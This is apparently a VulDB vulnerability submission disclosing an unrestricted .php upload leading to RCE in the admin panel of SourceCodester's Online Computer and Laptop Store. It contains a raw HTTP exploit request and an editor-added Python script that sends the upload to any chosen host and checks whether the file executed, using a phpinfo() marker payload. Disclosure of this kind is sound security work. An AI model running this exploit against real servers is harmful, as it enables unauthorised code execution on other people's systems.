Submit #109687: Online Computer and Laptop Store Background RCE

Title: Online Computer and Laptop Store Background RCE
Description: Brief description: Online Computer and Laptop Store admin-panel ("background") RCE.
Reason: The admin page php-ocls\admin\system_info\index.php offers a file upload. Clicking upload sends the file to php-ocls\classes\SystemSettings.php (f=update_settings), which is where the upload is handled. There is no restriction on the uploaded file type, so a .php file can be uploaded directly and is then executed by the server, giving RCE.
Payload: only the Host and Cookie in the request below need to be changed to match the target (the request is issued from the admin panel, so the PHPSESSID must belong to a logged-in admin session).
---------------------------------------------------------------------------------------------------------------------------
POST /php-ocls/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: 192.168.5.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------107417980941863249932677197760
Content-Length: 185
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/php-ocls/admin/?page=system_info
Cookie: PHPSESSID=pu8agldg93unebq0kmn6upugn3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------107417980941863249932677197760
Content-Disposition: form-data; name="img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
---------------------------------------------------------------------------------------------------------------------------
Source: www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
User: jsbae3449 (UID 30775)
Submission: 04/03/2023 18:11 (3 years ago)
Moderation: 04/04/2023 10:36 (16 hours later)
Status: Accepted
VulDB entry: 224841 [SourceCodester Online Computer and Laptop Store 1.0 index.php img unrestricted upload]
Points: 17
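The submission gives the raw request only. The following script, added here by the editor and not part of the submission or of the SourceCodester project, builds the same multipart/form-data body (field "img", filename "1.php", PHP marker payload) from the standard library so the Host and Cookie can be swapped without hand-editing a captured request, and checks whether a fetched page was served as executed PHP rather than as the stored source. The boundary generation, the helper names, and the "PHP Version" marker used to recognise phpinfo() output are the editor's assumptions; the location where SystemSettings.php stores the uploaded file is not given in the submission, so the tester must take it from the application's response before calling looks_executed().

```python
"""Reproduce the php-ocls unrestricted-upload request described in the submission.

Editor-added example; names and helpers are hypothetical, the target path and
field name are taken from the submitted request.
"""
import http.client
import uuid

# Endpoint and form field exactly as in the submitted request.
TARGET_PATH = "/php-ocls/classes/SystemSettings.php?f=update_settings"
FIELD_NAME = "img"


def build_multipart(field_name, filename, content, boundary=None):
    """Return (content_type_header, body_bytes) for one file field.

    The body mirrors the submitted PoC: one part, a filename ending in .php,
    and a generic octet-stream content type. Each dash line in the body is
    "--" + boundary, and the final line is "--" + boundary + "--".
    """
    if boundary is None:
        # Assumption: a Firefox-style boundary; any unique string works.
        boundary = "---------------------------" + uuid.uuid4().hex[:24]
    lines = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"',
        "Content-Type: application/octet-stream",
        "",
        content,
        f"--{boundary}--",
        "",
    ]
    body = "\r\n".join(lines).encode()
    return f"multipart/form-data; boundary={boundary}", body


def upload(host, cookie, filename="1.php", content="<?php phpinfo();?>",
           path=TARGET_PATH, timeout=10):
    """POST the file to the update_settings handler; returns (status, response_text).

    host   - e.g. "192.168.5.139" (replace with the target)
    cookie - e.g. "PHPSESSID=..." from a logged-in admin session
    """
    content_type, body = build_multipart(FIELD_NAME, filename, content)
    headers = {
        "Content-Type": content_type,
        "Content-Length": str(len(body)),  # computed, not copied from the capture
        "Cookie": cookie,
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"http://{host}/php-ocls/admin/?page=system_info",
    }
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


def looks_executed(response_text):
    """True if a fetched copy of the uploaded file was run by PHP, not echoed back.

    phpinfo() output always contains "PHP Version"; a server that stores but does
    not execute the file returns the literal "<?php phpinfo();?>" instead.
    """
    return "PHP Version" in response_text and "<?php" not in response_text


if __name__ == "__main__":
    # Constructed call: replace host and cookie with values for your own test target.
    status, text = upload("192.168.5.139", "PHPSESSID=pu8agldg93unebq0kmn6upugn3")
    print(status, text[:200])
```

Use the JSON returned by update_settings (or the system_info page) to locate the stored file, fetch it, and pass the body to looks_executed(); a true result confirms the stored .php is served through the PHP interpreter, which is the condition that turns an unrestricted upload into remote code execution.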
